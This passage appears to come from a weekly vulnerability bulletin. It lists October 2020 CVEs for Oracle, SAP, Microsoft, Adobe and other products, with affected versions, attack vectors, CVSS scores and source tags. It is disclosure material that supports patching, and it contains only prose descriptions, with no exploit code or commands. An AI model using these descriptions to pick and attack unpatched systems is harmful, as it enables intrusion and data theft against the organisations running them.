oracle — rest_data_services	Vulnerability in the Oracle REST Data Services product of Oracle REST Data Services (component: General). Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c; Standalone ORDS: prior to 20.2.1. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle REST Data Services. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle REST Data Services accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).	2020-10-21	4	CVE-2020-14745 MISC
oracle — solaris	Vulnerability in the Oracle Solaris product of Oracle Systems (component: Filesystem). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Solaris. CVSS 3.1 Base Score 5.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	4.9	CVE-2020-14754 MISC
oracle — text	Vulnerability in the Oracle Text component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows unauthenticated attacker with network access via Oracle Net to compromise Oracle Text. Successful attacks of this vulnerability can result in takeover of Oracle Text. CVSS 3.1 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).	2020-10-21	6.8	CVE-2020-14734 MISC
oracle — trade_management	Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Trade Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Trade Management accessible data as well as unauthorized update, insert or delete access to some of Oracle Trade Management accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).	2020-10-21	5.8	CVE-2020-14833 MISC
oracle — trade_management	Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Trade Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Trade Management accessible data as well as unauthorized update, insert or delete access to some of Oracle Trade Management accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).	2020-10-21	5.8	CVE-2020-14808 MISC
oracle — trade_management	Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Trade Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Trade Management accessible data as well as unauthorized update, insert or delete access to some of Oracle Trade Management accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).	2020-10-21	5.8	CVE-2020-14834 MISC
oracle — trade_management	Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Trade Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Trade Management accessible data as well as unauthorized update, insert or delete access to some of Oracle Trade Management accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).	2020-10-21	5.8	CVE-2020-14857 MISC
oracle — utilities_framework	Vulnerability in the Oracle Utilities Framework product of Oracle Utilities Applications (component: System Wide). Supported versions that are affected are 2.2.0.0.0, 4.2.0.2.0, 4.2.0.3.0, 4.3.0.1.0 – 4.3.0.6.0, 4.4.0.0.0 and 4.4.0.2.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Utilities Framework. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Utilities Framework accessible data as well as unauthorized read access to a subset of Oracle Utilities Framework accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N).	2020-10-21	5.5	CVE-2020-14895 MISC
oracle — vm_virtualbox	Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.16. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N).	2020-10-21	4.9	CVE-2020-14889 MISC
oracle — vm_virtualbox	Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.16. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N).	2020-10-21	4.9	CVE-2020-14886 MISC MISC
oracle — vm_virtualbox	Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.16. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. CVSS 3.1 Base Score 5.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).	2020-10-21	4.9	CVE-2020-14892 MISC
oracle — weblogic_server	Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).	2020-10-21	5	CVE-2020-14820 MISC
oracle — weblogic_server	Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Services). The supported version that is affected is 12.2.1.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle WebLogic Server accessible data as well as unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 6.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N).	2020-10-21	6.8	CVE-2020-14757 MISC
orchid — platform	In platform before version 9.4.4, inline attributes are not properly escaped. If the data that came from users was not escaped, then an XSS vulnerability is possible. The issue was introduced in 9.0.0 and fixed in 9.4.4.	2020-10-19	4.3	CVE-2020-15263 MISC CONFIRM
powerdns — recursor	An issue has been found in PowerDNS Recursor before 4.1.18, 4.2.x before 4.2.5, and 4.3.x before 4.3.5. A remote attacker can cause the cached records for a given name to be updated to the Bogus DNSSEC validation state, instead of their actual DNSSEC Secure state, via a DNS ANY query. This results in a denial of service for installation that always validate (dnssec=validate), and for clients requesting validation when on-demand validation is enabled (dnssec=process).	2020-10-16	5	CVE-2020-25829 SUSE CONFIRM
sap — 3d_visual_enterprise_viewer	SAP 3D Visual Enterprise Viewer, version 9, allows an attacker to send certain manipulated file to the victim, which can lead to leakage of sensitive information when the victim loads the malicious file into the VE viewer, leading to Information Disclosure.	2020-10-20	4.3	CVE-2020-6315 MISC MISC
sap — banking_services	SAP Banking Services version 500, use an incorrect authorization object in some of its reports. Although the affected reports are protected with otherauthorization objects, exploitation of the vulnerability could lead to privilege escalation and violation in segregation of duties, which in turn could lead to Service interruptions and system unavailability for the victim and users of the component.	2020-10-20	6.8	CVE-2020-6362 MISC MISC
sap — businessobjects_business_intelligence_platform	SAP BusinessObjects Business Intelligence Platform (Web Services) versions – 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability.	2020-10-20	5	CVE-2020-6308 MISC MISC
sap — netweaver_compare_systems	SAP NetWeaver (Compare Systems) versions – 7.20, 7.30, 7.40, 7.50, does not sufficiently validate uploaded XML documents. An attacker with administrative privileges can retrieve arbitrary files including files on OS level from the server and/or can execute a denial-of-service.	2020-10-20	5.5	CVE-2020-6366 MISC MISC
sap — netweaver_composite_application_framework	There is a reflected cross site scripting vulnerability in SAP NetWeaver Composite Application Framework, versions – 7.20, 7.30, 7.31, 7.40, 7.50. An unauthenticated attacker can trick an unsuspecting authenticated user to click on a malicious link. The end users browser has no way to know that the script should not be trusted, and will execute the script, resulting in sensitive information being disclosed or modified.	2020-10-20	4.3	CVE-2020-6367 MISC MISC
ts.ed_project — ts.ed	This affects the package @tsed/core before 5.65.7. This vulnerability relates to the deepExtend function which is used as part of the utils directory. Depending on if user input is provided, an attacker can overwrite and pollute the object prototype of a program.	2020-10-20	6.8	CVE-2020-7748 MISC MISC MISC
yandex — yandex_browser	User Interface (UI) Misrepresentation of Critical Information vulnerability in the address bar of the Yandex Browser allows an attacker to obfuscate the true source of data as presented in the browser. This issue affects the Yandex Browser version 20.8.3 and prior versions, and was fixed in version 20.8.4 released October 1, 2020.	2020-10-20	4.3	CVE-2020-7369 MISC MISC

Low Vulnerabilities

Primary Vendor — Product	Description	Published	CVSS Score	Source & Patch Info
apple — ipad_os	An issue existed in the handling of environment variables. This issue was addressed with improved validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6. A local user may be able to view sensitive user information.	2020-10-16	2.1	CVE-2020-9934 MISC MISC
apple — ipad_os	A lock screen issue allowed access to messages on a locked device. This issue was addressed with improved state management. This issue is fixed in iOS 14.0 and iPadOS 14.0. A person with physical access to an iOS device may be able to view notification contents from the lockscreen.	2020-10-16	2.1	CVE-2020-9959 MISC
apple — mac_os_x	This issue was addressed with improved data protection. This issue is fixed in macOS Catalina 10.15.6. A local user may be able to leak sensitive user information.	2020-10-16	2.1	CVE-2020-9913 MISC
apple — safari	A logic issue was addressed with improved restrictions. This issue is fixed in Safari 13.1.2. A malicious attacker may be able to change the origin of a frame for a download in Safari Reader mode.	2020-10-16	2.1	CVE-2020-9912 MISC
cisco — firepower_threat_defense	A vulnerability in the CLI of Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to access hidden commands. The vulnerability is due to the presence of undocumented configuration commands. An attacker could exploit this vulnerability by performing specific steps that make the hidden commands accessible. A successful exploit could allow the attacker to make configuration changes to various sections of an affected device that should not be exposed to CLI access.	2020-10-21	1.9	CVE-2020-3352 CISCO
halgatewood — testimonial_rotator	Testimonial Rotator WordPress Plugin 3.0.2 is affected by Cross Site Scripting (XSS) in /wp-admin/post.php. If a user intercepts a request and inserts a payload in “cite” parameter, the payload will be stored in the database.	2020-10-16	3.5	CVE-2020-26672 MISC
huawei — mate_20_firmware	HUAWEI Mate 20 versions earlier than 10.1.0.163(C00E160R3P8) have a JavaScript injection vulnerability. A module does not verify a specific input. This could allow attackers to bypass filter mechanism to launch JavaScript injection. This could compromise normal service of the affected module.	2020-10-19	2.1	CVE-2020-9092 MISC
ibm — spectrum_scale	IBM Spectrum Scale V4.2.0.0 through V4.2.3.22 and V5.0.0.0 through V5.0.5 could allow a local attacker to cause a denial of service by sending a large number of RPC requests to the mmfsd daemon which would cause the service to crash. IBM X-Force ID: 181991.	2020-10-20	2.1	CVE-2020-4491 XF CONFIRM
ibm — spectrum_scale	IBM Spectrum Scale 5.0.0 through 5.0.5.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 188595.	2020-10-20	3.5	CVE-2020-4755 XF CONFIRM
ibm — sterling_b2b_integrator	IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.0.3.1 and IBM Sterling File Gateway 2.2.0.0 through 6.0.3.1 are vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 183933.	2020-10-20	3.5	CVE-2020-4564 XF CONFIRM CONFIRM
lightning-viz — lightning	This affects all versions of package lightning-server. It is possible to inject malicious JavaScript code as part of a session controller.	2020-10-20	3.5	CVE-2020-7747 MISC MISC MISC
microsoft — dynamics_365	An elevation of privilege vulnerability exists in Microsoft Dynamics 365 Commerce, aka ‘Dynamics 365 Commerce Elevation of Privilege Vulnerability’.	2020-10-16	3.3	CVE-2020-16943 MISC
microsoft — dynamics_365	A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka ‘Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability’. This CVE ID is unique from CVE-2020-16978.	2020-10-16	3.5	CVE-2020-16956 MISC
microsoft — dynamics_365	A cross site scripting vulnerability exists when Microsoft Dynamics 365 (on-premises) does not properly sanitize a specially crafted web request to an affected Dynamics server, aka ‘Microsoft Dynamics 365 (On-Premise) Cross Site Scripting Vulnerability’. This CVE ID is unique from CVE-2020-16956.	2020-10-16	3.5	CVE-2020-16978 MISC
microsoft — sharepoint_designer	A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka ‘Microsoft Office SharePoint XSS Vulnerability’. This CVE ID is unique from CVE-2020-16945.	2020-10-16	3.5	CVE-2020-16946 MISC
microsoft — sharepoint_enterprise_server	An information disclosure vulnerability exists when Microsoft SharePoint Server improperly discloses its folder structure when rendering specific web pages, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16942, CVE-2020-16948, CVE-2020-16950, CVE-2020-16953.	2020-10-16	2.1	CVE-2020-16941 MISC
microsoft — sharepoint_enterprise_server	This vulnerability is caused when SharePoint Server does not properly sanitize a specially crafted request to an affected SharePoint server.An authenticated attacker could exploit this vulnerability by sending a specially crafted request to an affected SharePoint server, aka ‘Microsoft SharePoint Reflective XSS Vulnerability’.	2020-10-16	3.5	CVE-2020-16944 MISC
microsoft — sharepoint_enterprise_server	A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka ‘Microsoft Office SharePoint XSS Vulnerability’. This CVE ID is unique from CVE-2020-16946.	2020-10-16	3.5	CVE-2020-16945 MISC
microsoft — sharepoint_enterprise_server	An information disclosure vulnerability exists when Microsoft SharePoint Server improperly discloses its folder structure when rendering specific web pages, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16941, CVE-2020-16948, CVE-2020-16950, CVE-2020-16953.	2020-10-16	2.1	CVE-2020-16942 MISC
microsoft — windows_10	An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.To exploit this vulnerability, an authenticated attacker could run a specially crafted application, aka ‘Windows Kernel Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16938.	2020-10-16	2.1	CVE-2020-16901 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when Microsoft Windows improperly handles reparse points, aka ‘Windows Elevation of Privilege Vulnerability’.	2020-10-16	3.6	CVE-2020-16877 MISC
microsoft — windows_10	An information disclosure vulnerability exists when NetBIOS over TCP (NBT) Extensions (NetBT) improperly handle objects in memory, aka ‘NetBT Information Disclosure Vulnerability’.	2020-10-16	2.1	CVE-2020-16897 MISC
microsoft — windows_10	An information disclosure vulnerability exists when the Windows Enterprise App Management Service improperly handles certain file operations, aka ‘Windows Enterprise App Management Service Information Disclosure Vulnerability’.	2020-10-16	2.1	CVE-2020-16919 MISC
microsoft — windows_10	An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system, aka ‘Windows GDI+ Information Disclosure Vulnerability’.	2020-10-16	2.1	CVE-2020-16914 MISC
microsoft — windows_10	An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka ‘Windows Kernel Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16901.	2020-10-16	2.1	CVE-2020-16938 MISC
microsoft — windows_10	An information disclosure vulnerability exists in Text Services Framework when it fails to properly handle objects in memory, aka ‘Windows Text Services Framework Information Disclosure Vulnerability’.	2020-10-16	2.1	CVE-2020-16921 MISC
microsoft — windows_10	A spoofing vulnerability exists when Windows incorrectly validates file signatures, aka ‘Windows Spoofing Vulnerability’.	2020-10-16	2.1	CVE-2020-16922 MISC
oracle — hospitality_reporting_and_analytics	Vulnerability in the Oracle Hospitality Reporting and Analytics product of Oracle Food and Beverage Applications (component: Installation). The supported version that is affected is 9.1.0. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Hospitality Reporting and Analytics executes to compromise Oracle Hospitality Reporting and Analytics. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Hospitality Reporting and Analytics, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Hospitality Reporting and Analytics accessible data. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N).	2020-10-21	1.9	CVE-2020-14753 MISC
oracle — hyperion_bi+	Vulnerability in the Hyperion BI+ product of Oracle Hyperion (component: IQR-Foundation service). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise Hyperion BI+. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Hyperion BI+ accessible data. CVSS 3.1 Base Score 4.2 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:N/A:N).	2020-10-21	2.1	CVE-2020-14767 MISC
oracle — hyperion_planning	Vulnerability in the Hyperion Planning product of Oracle Hyperion (component: Application Development Framework). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows high privileged attacker with network access via HTTP to compromise Hyperion Planning. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Hyperion Planning accessible data. CVSS 3.1 Base Score 4.2 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:N).	2020-10-21	2.1	CVE-2020-14764 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server. CVSS 3.1 Base Score 2.2 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L).	2020-10-21	3.5	CVE-2020-14791 CONFIRM MISC
oracle — retail_customer_management_and_segmentation_foundation	Vulnerability in the Oracle Retail Customer Management and Segmentation Foundation product of Oracle Retail Applications (component: Promotions). The supported version that is affected is 19.0. Difficult to exploit vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Retail Customer Management and Segmentation Foundation. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Retail Customer Management and Segmentation Foundation accessible data. CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N).	2020-10-21	3.5	CVE-2020-14732 MISC
oracle — retail_customer_management_and_segmentation_foundation	Vulnerability in the Oracle Retail Customer Management and Segmentation Foundation product of Oracle Retail Applications (component: Segment). Supported versions that are affected are 18.0 and 19.0. Difficult to exploit vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Retail Customer Management and Segmentation Foundation. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Retail Customer Management and Segmentation Foundation accessible data. CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N).	2020-10-21	3.5	CVE-2020-14731 MISC
oracle — solaris	Vulnerability in the Oracle Solaris product of Oracle Systems (component: Utility). The supported version that is affected is 11. Difficult to exploit vulnerability allows low privileged attacker with network access via SSH to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Solaris accessible data. CVSS 3.1 Base Score 3.0 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N).	2020-10-21	2.1	CVE-2020-14818 MISC
oracle — solaris	Vulnerability in the Oracle Solaris product of Oracle Systems (component: Kernel). The supported version that is affected is 11. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Solaris accessible data. CVSS 3.1 Base Score 2.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N).	2020-10-21	3.3	CVE-2020-14759 MISC
oracle — solaris	Vulnerability in the Oracle Solaris product of Oracle Systems (component: Kernel). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Solaris accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Solaris. CVSS 3.1 Base Score 5.6 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:L).	2020-10-21	3.6	CVE-2020-14758 MISC
oracle — sql_developer	Vulnerability in the SQL Developer Install component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1 and 18c. Easily exploitable vulnerability allows low privileged attacker having Client Computer User Account privilege with logon to the infrastructure where SQL Developer Install executes to compromise SQL Developer Install. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of SQL Developer Install accessible data. CVSS 3.1 Base Score 2.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N).	2020-10-21	1.9	CVE-2020-14740 MISC
sap — netweaver_design_time_repository	SAP NetWeaver Design Time Repository (DTR), versions – 7.11, 7.30, 7.31, 7.40, 7.50, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability.	2020-10-20	3.5	CVE-2020-6370 MISC MISC
vmware — horizon_client	VMware Horizon Client for Windows (5.x before 5.5.0) contains a denial-of-service vulnerability due to a file system access control issue during install time. Successful exploitation of this issue may allow an attacker to overwrite certain admin privileged files through a symbolic link attack at install time. This will result into a denial-of-service condition on the machine where Horizon Client for Windows is installed.	2020-10-16	3.6	CVE-2020-3991 MISC

Severity Not Yet Assigned

Primary Vendor — Product	Description	Published	CVSS Score	Source & Patch Info
adobe — after_effects	Adobe After Effects version 17.1.1 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted .aepx file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. This vulnerability requires user interaction to exploit.	2020-10-21	not yet calculated	CVE-2020-24418 MISC
adobe — after_effects	Adobe After Effects version 17.1.1 (and earlier) for Windows is affected by an uncontrolled search path vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2020-10-21	not yet calculated	CVE-2020-24419 MISC
adobe — animate	Adobe Animate version 20.5 (and earlier) is affected by a stack overflow vulnerability, which could lead to arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted .fla file in Animate.	2020-10-21	not yet calculated	CVE-2020-9748 MISC
adobe — creative_cloud_desktop_application	Adobe Creative Cloud Desktop Application version 5.2 (and earlier) and 2.1 (and earlier) for Windows is affected by an uncontrolled search path vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2020-10-21	not yet calculated	CVE-2020-24422 MISC
adobe — dreamweaver	Dreamweaver version 20.2 (and earlier) is affected by an uncontrolled search path element vulnerability that could lead to privilege escalation. Successful exploitation could result in a local user with permissions to write to the file system running system commands with administrator privileges.	2020-10-21	not yet calculated	CVE-2020-24425 MISC
adobe — indesign	Adobe InDesign version 15.1.2 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious .indd file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.	2020-10-21	not yet calculated	CVE-2020-24421 MISC
adobe — magento	In Magento (rubygems openmage/magento-lts package) before versions 19.4.8 and 20.0.4, an admin user can generate soap credentials that can be used to trigger RCE via PHP Object Injection through product attributes and a product. The issue is patched in versions 19.4.8 and 20.0.4.	2020-10-21	not yet calculated	CVE-2020-15244 MISC CONFIRM
adobe — media_encoder	Adobe Media Encoder version 14.4 (and earlier) for Windows is affected by an uncontrolled search path vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2020-10-21	not yet calculated	CVE-2020-24423 MISC
adobe — photoshop	Adobe Photoshop for Windows version 21.2.1 (and earlier) is affected by an uncontrolled search path element vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2020-10-21	not yet calculated	CVE-2020-24420 MISC
adobe — premiere_pro	Adobe Premiere Pro version 14.4 (and earlier) is affected by an uncontrolled search path element that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.	2020-10-21	not yet calculated	CVE-2020-24424 MISC
amazon — aws_firecracker	In Amazon AWS Firecracker before 0.21.3, and 0.22.x before 0.22.1, the serial console buffer can grow its memory usage without limit when data is sent to the standard input. This can result in a memory leak on the microVM emulation thread, possibly occupying more memory than intended on the host.	2020-10-16	not yet calculated	CVE-2020-27174 MLIST MISC MISC MISC
anuko — time_tracker	In Anuko Time Tracker before verion 1.19.23.5325, due to not properly filtered user input a CSV export of a report could contain cells that are treated as formulas by spreadsheet software (for example, when a cell value starts with an equal sign). This is fixed in version 1.19.23.5325.	2020-10-16	not yet calculated	CVE-2020-15255 MISC CONFIRM
apache — hadoop	Web endpoint authentication check is broken in Apache Hadoop 3.0.0-alpha4, 3.0.0-beta1, and 3.0.0. Authenticated users may impersonate any user even if no proxy user is configured.	2020-10-21	not yet calculated	CVE-2018-11764 MISC
apache — kylin	Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed Kylin’s configuration information without any authentication, so it is dangerous because some confidential information entries will be disclosed to everyone.	2020-10-19	not yet calculated	CVE-2020-13937 MISC
